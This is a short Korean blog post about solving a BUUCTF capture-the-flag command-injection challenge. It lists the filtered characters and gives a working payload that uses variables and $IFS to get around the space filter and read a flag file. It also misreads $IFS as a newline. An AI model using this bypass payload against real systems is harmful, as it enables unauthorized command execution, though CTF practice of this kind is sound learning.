command injection

 

{} [] () %20 %09 %0a ' " ? * 등 문자 다 필터링

 

$ = ` 등 사용 가능

 

?ip=127.0.0.1;b=g.php;a=fla;cat$IFS$a$b;

 

$IFS 는 개행을 나타내는가보다

 

저작자표시 비영리 동일조건

'Web > BUUCTF' 카테고리의 다른 글

[BUUCTF] - [极客大挑战 2019]BuyFlag1  (0) 2020.03.06
[BUUCTF] - [极客大挑战 2019]BabySQL1  (0) 2020.03.06
[BUUCTF] - [SUCTF 2019]Pythonginx1  (0) 2020.02.28
[BUUCTF] - [极客大挑战 2019]Http1  (0) 2020.02.28
[BUUCTF] - [BUUCTF 2018]Online Tool  (0) 2020.02.28

+ Recent posts

티스토리툴바